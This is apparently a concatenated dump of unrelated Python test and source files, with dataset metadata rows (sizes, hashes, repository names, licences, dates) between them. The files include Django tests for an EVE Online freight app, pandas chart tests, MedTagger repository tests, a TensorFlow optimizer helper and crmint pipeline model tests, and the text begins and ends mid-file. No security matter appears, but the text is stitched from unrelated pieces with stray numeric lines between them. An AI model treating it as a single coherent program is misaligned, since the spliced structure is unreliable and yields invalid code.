self.assertNotEqual(response.status_code, HTTP_OK)
def test_user_access_with_permission(self):
request = self.factory.get(reverse("freight:contract_list_user"))
request.user = self.user_1
response = views.contract_list_user(request)
self.assertEqual(response.status_code, HTTP_OK)
def test_data_user_no_access_without_permission_1(self):
request = self.factory.get(
reverse("freight:contract_list_data", args={views.CONTRACT_LIST_USER})
)
request.user = self.user_2
response = views.contract_list_data(request, views.CONTRACT_LIST_USER)
data = json_response_to_python(response)
self.assertListEqual(data, [])
def test_data_user_no_access_without_permission_2(self):
request = self.factory.get(
reverse("freight:contract_list_data", args={views.CONTRACT_LIST_ACTIVE})
)
request.user = self.user_2
response = views.contract_list_data(request, views.CONTRACT_LIST_ACTIVE)
data = json_response_to_python(response)
self.assertListEqual(data, [])
def test_data_user_no_access_without_permission_3(self):
request = self.factory.get(
reverse("freight:contract_list_data", args={views.CONTRACT_LIST_ALL})
)
request.user = self.user_2
response = views.contract_list_data(request, views.CONTRACT_LIST_ALL)
data = json_response_to_python(response)
self.assertListEqual(data, [])
def test_data_user(self):
request = self.factory.get(
reverse("freight:contract_list_data", args={views.CONTRACT_LIST_USER})
)
request.user = self.user_1
response = views.contract_list_data(request, views.CONTRACT_LIST_USER)
self.assertEqual(response.status_code, HTTP_OK)
data = json_response_to_python(response)
contract_ids = {x["contract_id"] for x in data}
self.assertSetEqual(
contract_ids,
{
149409016,
149409061,
149409062,
149409063,
149409064,
},
)
class TestSetupContractHandler(NoSocketsTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
_, cls.user = create_contract_handler_w_contracts([])
AuthUtils.add_permission_to_user_by_name(
"freight.setup_contract_handler", cls.user
)
with DisconnectPricingSaveHandler():
jita = Location.objects.get(id=60003760)
amamake = Location.objects.get(id=1022167642188)
cls.pricing = Pricing.objects.create(
start_location=jita, end_location=amamake, price_base=500000000
)
Contract.objects.update_pricing()
cls.factory = RequestFactory()
@patch(MODULE_PATH + ".FREIGHT_OPERATION_MODE", FREIGHT_OPERATION_MODE_MY_ALLIANCE)
@patch(MODULE_PATH + ".messages_plus", autospec=True)
@patch(MODULE_PATH + ".tasks.run_contracts_sync", autospec=True)
def test_normal(self, mock_run_contracts_sync, mock_message_plus):
ContractHandler.objects.all().delete()
token = Mock(spec=Token)
token.character_id = self.user.profile.main_character.character_id
request = self.factory.post(
reverse("freight:setup_contract_handler"), data={"_token": 1}
)
request.user = self.user
request.token = token
orig_view = views.setup_contract_handler.__wrapped__.__wrapped__.__wrapped__
response = orig_view(request, token)
self.assertEqual(mock_run_contracts_sync.delay.call_count, 1)
self.assertEqual(response.status_code, HTTP_REDIRECT)
self.assertEqual(response.url, reverse("freight:index"))
@patch(MODULE_PATH + ".FREIGHT_OPERATION_MODE", FREIGHT_OPERATION_MODE_MY_ALLIANCE)
@patch(MODULE_PATH + ".messages_plus", autospec=True)
@patch(MODULE_PATH + ".tasks.run_contracts_sync", autospec=True)
def test_error_no_alliance_member(self, mock_run_contracts_sync, mock_message_plus):
ContractHandler.objects.all().delete()
token = Mock(spec=Token)
token_char = EveCharacter.objects.get(character_id=90000005)
token.character_id = token_char.character_id
request = self.factory.post(
reverse("freight:setup_contract_handler"), data={"_token": 1}
)
request.user = self.user
request.token = token
orig_view = views.setup_contract_handler.__wrapped__.__wrapped__.__wrapped__
response = orig_view(request, token)
self.assertEqual(mock_message_plus.error.call_count, 1)
self.assertEqual(response.status_code, HTTP_REDIRECT)
self.assertEqual(response.url, reverse("freight:index"))
@patch(
MODULE_PATH + ".FREIGHT_OPERATION_MODE", FREIGHT_OPERATION_MODE_MY_CORPORATION
)
@patch(MODULE_PATH + ".messages_plus", autospec=True)
@patch(MODULE_PATH + ".tasks.run_contracts_sync", autospec=True)
def test_error_character_not_owned(
self, mock_run_contracts_sync, mock_message_plus
):
ContractHandler.objects.all().delete()
token = Mock(spec=Token)
token_char = EveCharacter.objects.get(character_id=90000005)
token.character_id = token_char.character_id
request = self.factory.post(
reverse("freight:setup_contract_handler"), data={"_token": 1}
)
request.user = self.user
request.token = token
orig_view = views.setup_contract_handler.__wrapped__.__wrapped__.__wrapped__
response = orig_view(request, token)
self.assertEqual(mock_message_plus.error.call_count, 1)
self.assertEqual(response.status_code, HTTP_REDIRECT)
self.assertEqual(response.url, reverse("freight:index"))
@patch(
MODULE_PATH + ".FREIGHT_OPERATION_MODE", FREIGHT_OPERATION_MODE_MY_CORPORATION
)
@patch(MODULE_PATH + ".messages_plus", autospec=True)
@patch(MODULE_PATH + ".tasks.run_contracts_sync", autospec=True)
def test_error_wrong_operation_mode(
self, mock_run_contracts_sync, mock_message_plus
):
token = Mock(spec=Token)
token.character_id = self.user.profile.main_character.character_id
request = self.factory.post(
reverse("freight:setup_contract_handler"), data={"_token": 1}
)
request.user = self.user
request.token = token
orig_view = views.setup_contract_handler.__wrapped__.__wrapped__.__wrapped__
response = orig_view(request, token)
self.assertEqual(mock_message_plus.error.call_count, 1)
self.assertEqual(response.status_code, HTTP_REDIRECT)
self.assertEqual(response.url, reverse("freight:index"))
class TestStatistics(NoSocketsTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
_, cls.user = create_contract_handler_w_contracts()
# expected contracts to load: 149409118, 149409218, 149409318
cls.user = AuthUtils.add_permission_to_user_by_name(
"freight.basic_access", cls.user
)
cls.user = AuthUtils.add_permission_to_user_by_name(
"freight.view_statistics", cls.user
)
with DisconnectPricingSaveHandler():
jita = Location.objects.get(id=60003760)
amamake = Location.objects.get(id=1022167642188)
cls.pricing = Pricing.objects.create(
start_location=jita, end_location=amamake, price_base=500000000
)
Contract.objects.update_pricing()
cls.factory = RequestFactory()
def test_statistics_routes_data(self):
request = self.factory.get(reverse("freight:statistics_routes_data"))
request.user = self.user
response = views.statistics_routes_data(request)
self.assertEqual(response.status_code, HTTP_OK)
data = json_response_to_python(response)
self.assertListEqual(
data,
[
{
"contracts": 3,
"rewards": 300000000,
"collaterals": 3000000000,
"volume": 345000.0,
"pilots": 1,
"name": "Jita <-> Amamake",
"customers": 1,
}
],
)
def test_statistics_pilots_data(self):
request = self.factory.get(reverse("freight:statistics_pilots_data"))
request.user = self.user
response = views.statistics_pilots_data(request)
self.assertEqual(response.status_code, HTTP_OK)
data = json_response_to_python(response)
self.assertListEqual(
data,
[
{
"rewards": 300000000,
"collaterals": 3000000000,
"volume": 345000.0,
"corporation": "Wayne Enterprise",
"contracts": 3,
"name": "Bruce Wayne",
}
],
)
def test_statistics_pilot_corporations_data(self):
request = self.factory.get(
reverse("freight:statistics_pilot_corporations_data")
)
request.user = self.user
response = views.statistics_pilot_corporations_data(request)
self.assertEqual(response.status_code, HTTP_OK)
data = json_response_to_python(response)
self.assertListEqual(
data,
[
{
"name": "Wayne Enterprise",
"rewards": 300000000,
"collaterals": 3000000000,
"volume": 345000.0,
"alliance": "",
"contracts": 3,
}
],
)
def test_statistics_customer_data(self):
request = self.factory.get(reverse("freight:statistics_customer_data"))
request.user = self.user
response = views.statistics_customer_data(request)
self.assertEqual(response.status_code, HTTP_OK)
data = json_response_to_python(response)
self.assertListEqual(
data,
[
{
"rewards": 300000000,
"collaterals": 3000000000,
"volume": 345000.0,
"corporation": "Wayne Enterprise",
"contracts": 3,
"name": "Robin",
}
],
)
class TestAddLocation(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
_, cls.user = create_contract_handler_w_contracts([])
cls.factory = RequestFactory()
@patch(MODULE_PATH + ".FREIGHT_OPERATION_MODE", FREIGHT_OPERATION_MODE_MY_ALLIANCE)
@patch(MODULE_PATH + ".messages_plus", autospec=True)
@patch(MODULE_PATH + ".Location.objects.update_or_create_from_esi", autospec=True)
def test_normal(self, mock_update_or_create_from_esi, mock_message_plus):
location_id = 1022167642188
location = Location.objects.get(id=location_id)
mock_update_or_create_from_esi.return_value = location, False
my_character = self.user.profile.main_character
token = store_as_Token(
generate_token(
character_id=my_character.character_id,
character_name=my_character.character_name,
scopes=["publicData"],
),
self.user,
)
request = self.factory.post(
reverse("freight:add_location_2"), data={"location_id": location_id}
)
request.user = self.user
middleware = SessionMiddleware()
middleware.process_request(request)
request.session[views.ADD_LOCATION_TOKEN_TAG] = token.pk
request.session.save()
orig_view = views.add_location_2.__wrapped__.__wrapped__
response = orig_view(request)
self.assertEqual(response.status_code, HTTP_REDIRECT)
self.assertEqual(response.url, reverse("freight:add_location_2"))
self.assertEqual(mock_message_plus.success.call_count, 1)
self.assertEqual(mock_message_plus.error.call_count, 0)
@patch(MODULE_PATH + ".FREIGHT_OPERATION_MODE", FREIGHT_OPERATION_MODE_MY_ALLIANCE)
@patch(MODULE_PATH + ".messages_plus", autospec=True)
@patch(MODULE_PATH + ".Location.objects.update_or_create_from_esi", autospec=True)
def test_fetching_location_fails(
self, mock_update_or_create_from_esi, mock_message_plus
):
location_id = 1022167642188
Location.objects.get(id=location_id)
mock_update_or_create_from_esi.side_effect = RuntimeError("Test exception")
my_character = self.user.profile.main_character
token = store_as_Token(
generate_token(
character_id=my_character.character_id,
character_name=my_character.character_name,
scopes=["publicData"],
),
self.user,
)
request = self.factory.post(
reverse("freight:add_location_2"), data={"location_id": location_id}
)
request.user = self.user
middleware = SessionMiddleware()
middleware.process_request(request)
request.session[views.ADD_LOCATION_TOKEN_TAG] = token.pk
request.session.save()
orig_view = views.add_location_2.__wrapped__.__wrapped__
response = orig_view(request)
self.assertEqual(response.status_code, HTTP_OK)
self.assertEqual(mock_message_plus.success.call_count, 0)
self.assertEqual(mock_message_plus.error.call_count, 1)
| 38.015267
| 88
| 0.65497
| 2,157
| 19,920
| 5.712564
| 0.10663
| 0.03303
| 0.035059
| 0.035465
| 0.849132
| 0.821052
| 0.811557
| 0.798653
| 0.762701
| 0.735919
| 0
| 0.033354
| 0.253464
| 19,920
| 523
| 89
| 38.087954
| 0.795239
| 0.004016
| 0
| 0.635945
| 0
| 0
| 0.089959
| 0.052357
| 0
| 0
| 0
| 0.001912
| 0.099078
| 1
| 0.071429
| false
| 0
| 0.032258
| 0.006912
| 0.12212
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
88fa5a18c93ed69587f13fb808c922fb9fa883c7
| 2,740
|
py
|
Python
|
nostradamus/tests/analysis_and_training_tests/test_defect_submission.py
|
exactpro/nostradamus
|
80df847a012374ad2b702cc9f9c9cb46c1153ee7
|
[
"Apache-2.0"
] | 25
|
2019-12-18T05:32:41.000Z
|
2022-03-23T12:16:49.000Z
|
nostradamus/tests/analysis_and_training_tests/test_defect_submission.py
|
Exactpro/nostradamus
|
80df847a012374ad2b702cc9f9c9cb46c1153ee7
|
[
"Apache-2.0"
] | 12
|
2018-12-24T14:56:50.000Z
|
2019-11-29T16:53:49.000Z
|
nostradamus/tests/analysis_and_training_tests/test_defect_submission.py
|
exactpro/nostradamus
|
80df847a012374ad2b702cc9f9c9cb46c1153ee7
|
[
"Apache-2.0"
] | 7
|
2019-12-18T05:32:43.000Z
|
2021-08-18T05:27:04.000Z
|
from pandas import DataFrame
from apps.analysis_and_training.main.charts import get_defect_submission
def test_submission_chart_by_day(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%d.%m.%Y")
bugs = bugs.to_dict()["Key"]
bugs_by_months = get_defect_submission(dates, "Day")["created_line"]
bugs = {key: bugs[key] for key in bugs if key in bugs_by_months}
assert bugs == bugs_by_months
def test_submission_chart_by_week(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%d.%m.%Y")
bugs = bugs.to_dict()["Key"]
bugs_by_months = get_defect_submission(dates, "Week")["created_line"]
bugs_by_months.popitem()
bugs = {key: bugs[key] for key in bugs if key in bugs_by_months}
assert bugs == bugs_by_months
def test_submission_chart_by_month(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%b %Y")
bugs = bugs.to_dict()["Key"]
bugs_by_months = get_defect_submission(dates, "Month")["created_line"]
bugs = {key: bugs[key] for key in bugs if key in bugs_by_months}
assert bugs == bugs_by_months
def test_submission_chart_by_3_months(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%b %Y")
bugs = bugs.to_dict()["Key"]
bugs_by_months = get_defect_submission(dates, "3 Months")["created_line"]
bugs_by_months.popitem()
bugs = {key: bugs[key] for key in bugs if key in bugs_by_months}
assert bugs == bugs_by_months
def test_submission_chart_by_6_months(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%b %Y")
bugs = bugs.to_dict()["Key"]
bugs_by_months = get_defect_submission(dates, "6 Months")["created_line"]
bugs_by_months.popitem()
bugs = {key: bugs[key] for key in bugs if key in bugs_by_months}
assert bugs == bugs_by_months
def test_submission_chart_by_year(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%Y")
bugs = bugs.to_dict()["Key"]
bugs_by_months = get_defect_submission(dates, "Year")["created_line"]
bugs_by_months.popitem()
bugs = {key: bugs[key] for key in bugs if key in bugs_by_months}
assert bugs == bugs_by_months
def test_coordinates_equality(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%Y")
bugs_by_months = get_defect_submission(dates, "Month")
resolved_line_points = bugs_by_months["resolved_line"].keys()
created_line_points = bugs_by_months["created_line"].keys()
assert set(resolved_line_points) == set(created_line_points)
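# Note (inferred): the popitem() calls above drop the trailing, possibly
# partial bucket before comparing against the per-date counts built from
# the raw frame.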
| 29.462366
| 77
| 0.709489
| 412
| 2,740
| 4.415049
| 0.116505
| 0.082463
| 0.164926
| 0.08851
| 0.873557
| 0.836174
| 0.836174
| 0.836174
| 0.813084
| 0.813084
| 0
| 0.001749
| 0.165328
| 2,740
| 92
| 78
| 29.782609
| 0.793616
| 0
| 0
| 0.654545
| 0
| 0
| 0.086131
| 0
| 0
| 0
| 0
| 0
| 0.127273
| 1
| 0.127273
| false
| 0
| 0.036364
| 0
| 0.163636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0012273fce512ee48c14e0cecd18f6ab26121b2c
| 26
|
py
|
Python
|
dan/__init__.py
|
danagain/tensortrade
|
2eed6c4da09667e4e0536767366b57f2c8cbc5ca
|
[
"Apache-2.0"
] | null | null | null |
dan/__init__.py
|
danagain/tensortrade
|
2eed6c4da09667e4e0536767366b57f2c8cbc5ca
|
[
"Apache-2.0"
] | null | null | null |
dan/__init__.py
|
danagain/tensortrade
|
2eed6c4da09667e4e0536767366b57f2c8cbc5ca
|
[
"Apache-2.0"
] | null | null | null |
from .. import tensortrade
| 26
| 26
| 0.807692
| 3
| 26
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 1
| 26
| 26
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
cc44d496f3ed1be122da61177dc1e7e1dd695478
| 6,138
|
py
|
Python
|
backend/tests/functional_tests/test_labels_repository.py
|
kolszewska/MedTagger
|
c691c822dd23a9fb402d1314e7fe2e6bde898e9c
|
[
"Apache-2.0"
] | 71
|
2019-01-31T19:50:31.000Z
|
2022-02-20T07:36:49.000Z
|
backend/tests/functional_tests/test_labels_repository.py
|
kolszewska/MedTagger
|
c691c822dd23a9fb402d1314e7fe2e6bde898e9c
|
[
"Apache-2.0"
] | 379
|
2019-02-16T19:12:01.000Z
|
2022-03-11T23:12:24.000Z
|
backend/tests/functional_tests/test_labels_repository.py
|
kolszewska/MedTagger
|
c691c822dd23a9fb402d1314e7fe2e6bde898e9c
|
[
"Apache-2.0"
] | 16
|
2019-01-31T16:44:39.000Z
|
2022-02-14T15:23:29.000Z
|
"""Tests Labels Repository."""
from typing import Any
from medtagger.database.models import User
from medtagger.definitions import LabelTool
from medtagger.repositories import (
datasets as DatasetsRepository,
label_tags as LabelTagsRepository,
tasks as TasksRepository,
scans as ScansRepository,
labels as LabelsRepository,
users as UsersRepository,
)
from medtagger.types import LabelingTime
def test_get_predefined_label_for_scan_in_task__no_predefined_label(prepare_environment: Any) -> None:
"""Test for fetching Predefined Label that does not exist."""
# Step 1. Prepare a structure for the test
dataset = DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.RECTANGLE], task.id)
scan = ScansRepository.add_new_scan(dataset, 0)
# Step 2. Check if there is no Predefined Label
predefined_label = LabelsRepository.get_predefined_label_for_scan_in_task(scan, task)
assert not predefined_label
def test_get_predefined_label_for_scan_in_task__label_that_is_not_predefined(prepare_environment: Any) -> None:
"""Test for fetching Predefined Label that is not predefined."""
# Step 1. Prepare a structure for the test
dataset = DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.RECTANGLE], task.id)
scan = ScansRepository.add_new_scan(dataset, 0)
user_id = UsersRepository.add_new_user(User('user@medtagger', 'HASH', 'Admin', 'Admin'))
user = UsersRepository.get_user_by_id(user_id)
# Step 2. Add Label which is not predefined
LabelsRepository.add_new_label(scan.id, task.key, user, LabelingTime(0), is_predefined=False)
# Step 3. Check if there is no Predefined Label
predefined_label = LabelsRepository.get_predefined_label_for_scan_in_task(scan, task)
assert not predefined_label
def test_get_predefined_label_for_scan_in_task__predefined_label(prepare_environment: Any) -> None:
"""Test for fetching Predefined Label that exists."""
# Step 1. Prepare a structure for the test
dataset = DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.RECTANGLE], task.id)
scan = ScansRepository.add_new_scan(dataset, 0)
user_id = UsersRepository.add_new_user(User('user@medtagger', 'HASH', 'Admin', 'Admin'))
user = UsersRepository.get_user_by_id(user_id)
# Step 2. Add Label which is predefined
label = LabelsRepository.add_new_label(scan.id, task.key, user, LabelingTime(0), is_predefined=True)
# Step 3. Check if there is a Predefined Label
predefined_label = LabelsRepository.get_predefined_label_for_scan_in_task(scan, task)
assert predefined_label
assert predefined_label.id == label.id
def test_get_predefined_label_for_scan_in_task__predefined_label_for_given_task(prepare_environment: Any) -> None:
"""Test for fetching Predefined Label only for specific Task."""
# Step 1. Prepare a structure for the test
dataset = DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task_left = TasksRepository.add_task('MARK_LEFT', 'Mark Left', 'path/to/image', ['KIDNEYS'], '', [], [])
task_right = TasksRepository.add_task('MARK_RIGHT', 'Mark Right', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.RECTANGLE], task_left.id)
scan = ScansRepository.add_new_scan(dataset, 0)
user_id = UsersRepository.add_new_user(User('user@medtagger', 'HASH', 'Admin', 'Admin'))
user = UsersRepository.get_user_by_id(user_id)
# Step 2. Add Labels for each Task
label_left = LabelsRepository.add_new_label(scan.id, task_left.key, user, LabelingTime(0), is_predefined=True)
label_right = LabelsRepository.add_new_label(scan.id, task_right.key, user, LabelingTime(0), is_predefined=True)
# Step 3. Check if there are these Predefined Labels
predefined_label = LabelsRepository.get_predefined_label_for_scan_in_task(scan, task_left)
assert predefined_label
assert predefined_label.id == label_left.id
predefined_label = LabelsRepository.get_predefined_label_for_scan_in_task(scan, task_right)
assert predefined_label
assert predefined_label.id == label_right.id
def test_get_predefined_brush_label_elements(prepare_environment: Any) -> None:
"""Test for fetching Predefined Brush Label Elements."""
# Step 1. Prepare a structure for the test
dataset = DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
label_tag = LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.RECTANGLE], task.id)
scan = ScansRepository.add_new_scan(dataset, 3)
user_id = UsersRepository.add_new_user(User('user@medtagger', 'HASH', 'Admin', 'Admin'))
user = UsersRepository.get_user_by_id(user_id)
# Step 2. Add Label with Brush Elements
label = LabelsRepository.add_new_label(scan.id, task.key, user, LabelingTime(0), is_predefined=True)
LabelsRepository.add_new_brush_label_element(label.id, 0, 0, 0, b'', label_tag)
LabelsRepository.add_new_brush_label_element(label.id, 1, 0, 0, b'', label_tag)
LabelsRepository.add_new_brush_label_element(label.id, 2, 0, 0, b'', label_tag)
# Step 3. Check if there is a Predefined Label
brush_label_elements = LabelsRepository.get_predefined_brush_label_elements(scan.id, task.id, 0, 3)
assert len(brush_label_elements) == 3
brush_label_elements = LabelsRepository.get_predefined_brush_label_elements(scan.id, task.id, 0, 1)
assert len(brush_label_elements) == 1
| 54.803571
| 116
| 0.752362
| 827
| 6,138
| 5.301088
| 0.112455
| 0.116332
| 0.041058
| 0.043111
| 0.847628
| 0.814325
| 0.813184
| 0.788093
| 0.734033
| 0.703695
| 0
| 0.007375
| 0.138482
| 6,138
| 111
| 117
| 55.297297
| 0.821672
| 0.144835
| 0
| 0.478873
| 0
| 0
| 0.104899
| 0
| 0
| 0
| 0
| 0
| 0.140845
| 1
| 0.070423
| false
| 0
| 0.070423
| 0
| 0.140845
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
cc6e01946635abceb3d454d194b3c9952e000ba3
| 17
|
py
|
Python
|
l8/__init__.py
|
alastair/l8-python
|
8e2a2559ef8c160cc887a9bbcb34c2f3f01ce1d7
|
[
"BSD-2-Clause"
] | 1
|
2017-05-27T14:02:24.000Z
|
2017-05-27T14:02:24.000Z
|
l8/__init__.py
|
alastair/l8-python
|
8e2a2559ef8c160cc887a9bbcb34c2f3f01ce1d7
|
[
"BSD-2-Clause"
] | null | null | null |
l8/__init__.py
|
alastair/l8-python
|
8e2a2559ef8c160cc887a9bbcb34c2f3f01ce1d7
|
[
"BSD-2-Clause"
] | 1
|
2020-11-24T10:44:57.000Z
|
2020-11-24T10:44:57.000Z
|
from l8 import *
| 8.5
| 16
| 0.705882
| 3
| 17
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 0.235294
| 17
| 1
| 17
| 17
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
cc95ab89f3738d79f03c342ebf3af1f4fbb321cb
| 89
|
py
|
Python
|
tftf/models/optimizers/adagrad.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | 35
|
2018-08-11T05:01:41.000Z
|
2021-01-29T02:28:47.000Z
|
tftf/models/optimizers/adagrad.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | null | null | null |
tftf/models/optimizers/adagrad.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | 4
|
2018-10-19T14:12:04.000Z
|
2021-01-29T02:28:49.000Z
|
import tensorflow as tf
def adagrad(lr=0.01):
return tf.train.AdagradOptimizer(lr)
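# Note: tf.train.AdagradOptimizer is the TF 1.x API; the TF 2.x equivalent
# would be tf.keras.optimizers.Adagrad(learning_rate=lr).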
| 14.833333
| 40
| 0.741573
| 14
| 89
| 4.714286
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 0.157303
| 89
| 5
| 41
| 17.8
| 0.84
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
ccac31b2a41dcd20f558ec536b214d4cf8900c3d
| 19,433
|
py
|
Python
|
backends/tests/integration/core/models_tests.py
|
sneub/crmint
|
e2b475b94cdf5b18d8201e9a62d2a12087635219
|
[
"Apache-2.0"
] | null | null | null |
backends/tests/integration/core/models_tests.py
|
sneub/crmint
|
e2b475b94cdf5b18d8201e9a62d2a12087635219
|
[
"Apache-2.0"
] | null | null | null |
backends/tests/integration/core/models_tests.py
|
sneub/crmint
|
e2b475b94cdf5b18d8201e9a62d2a12087635219
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from google.appengine.ext import testbed
import mock
from core import models
from tests import utils
class TestPipelineWithJobs(utils.ModelTestCase):
def setUp(self):
super(TestPipelineWithJobs, self).setUp()
self.testbed = testbed.Testbed()
self.testbed.activate()
# Activate which service we want to stub
self.testbed.init_taskqueue_stub()
self.testbed.init_memcache_stub()
self.testbed.init_app_identity_stub()
def tearDown(self):
super(TestPipelineWithJobs, self).tearDown()
self.testbed.deactivate()
def test_start_fails_without_jobs(self):
pipeline = models.Pipeline.create()
self.assertEqual(pipeline.status, 'idle')
result = pipeline.start()
self.assertEqual(result, False)
self.assertEqual(pipeline.status, 'idle')
def test_start_fails_if_already_running(self):
pipeline = models.Pipeline.create()
pipeline.status = 'running'
pipeline.save()
self.assertEqual(pipeline.status, 'running')
result = pipeline.start()
self.assertEqual(result, False)
self.assertEqual(pipeline.status, 'running')
def test_start_succeeds_with_one_job_idle(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id)
self.assertEqual(pipeline.status, 'idle')
result = pipeline.start()
self.assertEqual(result, True)
self.assertEqual(pipeline.status, 'running')
def test_start_fails_with_one_job_running(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id)
job1.status = 'running'
job1.save()
self.assertEqual(pipeline.status, 'idle')
result = pipeline.start()
self.assertEqual(result, False)
self.assertEqual(pipeline.status, 'idle')
def test_start_succeeds_with_one_job_succeeded(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id)
job1.status = 'succeeded'
job1.save()
self.assertEqual(pipeline.status, 'idle')
result = pipeline.start()
self.assertEqual(result, True)
self.assertEqual(pipeline.status, 'running')
def test_start_succeeds_with_one_job_failed(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id)
job1.status = 'failed'
job1.save()
self.assertEqual(pipeline.status, 'idle')
result = pipeline.start()
self.assertEqual(result, True)
self.assertEqual(pipeline.status, 'running')
@mock.patch('core.logging.logger')
def test_start_fails_with_one_job_not_getting_ready(self, patched_logger):
patched_logger.log_struct.__name__ = 'foo'
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id)
models.Param.create(
job_id=job1.id,
name='field1',
type='number',
value='{% ABC %}') # initialize with a non-boolean value
self.assertEqual(pipeline.status, 'idle')
result = pipeline.start()
self.assertEqual(result, False)
self.assertEqual(pipeline.status, 'idle')
def test_stop_fails_if_not_running(self):
pipeline = models.Pipeline.create(status='idle')
self.assertEqual(pipeline.status, 'idle')
result = pipeline.stop()
self.assertEqual(result, False)
def test_stop_succeeds_and_stop_all_jobs(self):
pipeline = models.Pipeline.create(status='running')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
